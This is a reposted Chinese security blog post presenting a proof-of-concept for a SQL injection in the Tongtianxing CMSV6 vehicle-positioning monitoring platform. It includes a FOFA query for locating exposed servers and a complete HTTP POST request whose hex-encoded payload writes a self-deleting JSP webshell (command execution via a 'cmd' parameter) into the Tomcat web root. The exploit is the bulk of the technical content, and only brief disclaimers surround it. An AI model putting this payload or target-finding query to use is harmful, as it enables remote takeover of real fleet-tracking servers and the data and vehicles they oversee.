通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞 PoC

admin 2024年6月25日14:43:09评论84 views字数 1621阅读5分24秒阅读模式
 

0x01 免责声明

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02

产品介绍

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。
0x03

漏洞威胁

2024年5月,通天星CMSV6发布新版本修复了一处SQL注入漏洞。漏洞是由于通天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可通过SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复漏洞。
影响范围
通天星CMSV6车载定位监控平台 < 7.33.0.7_20240508
0x04

漏洞环境

FOFA:

body="/808gps/"

通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞 PoC

0x05

漏洞复现

POC

POST /point_manage/merge HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2882.93 Safari/537.36Content-Type: application/x-www-form-urlencodedid=1&name=1' UNION SELECT%0aNULL, 0x3c25206a6176612e696f2e496e70757453747265616d20696e203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229292e676574496e70757453747265616d28293b696e742061203d202d313b627974655b5d2062203d206e657720627974655b323034385d3b6f75742e7072696e7428223c7072653e22293b7768696c652828613d696e2e7265616428622929213d2d31297b6f75742e7072696e746c6e286e657720537472696e6728622c302c6129293b7d6f75742e7072696e7428223c2f7072653e22293b6e6577206a6176612e696f2e46696c65286170706c69636174696f6e2e6765745265616c5061746828726571756573742e676574536572766c657450617468282929292e64656c65746528293b253e,NULL,NULL,NULL,NULL,NULL,NULLINTO dumpfile '../../tomcat/webapps/gpsweb/rce.jsp' FROM user_session aWHERE '1 '='1 &type=3&map_id=4&install_place=5&check_item=6&create_time=7&update_time=8

SQL注入写webshell

通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞 PoC

通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞 PoC

 

原文始发于微信公众号(冷漠安全):「漏洞复现」通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月25日14:43:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞 PoChttps://cn-sec.com/archives/2882632.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息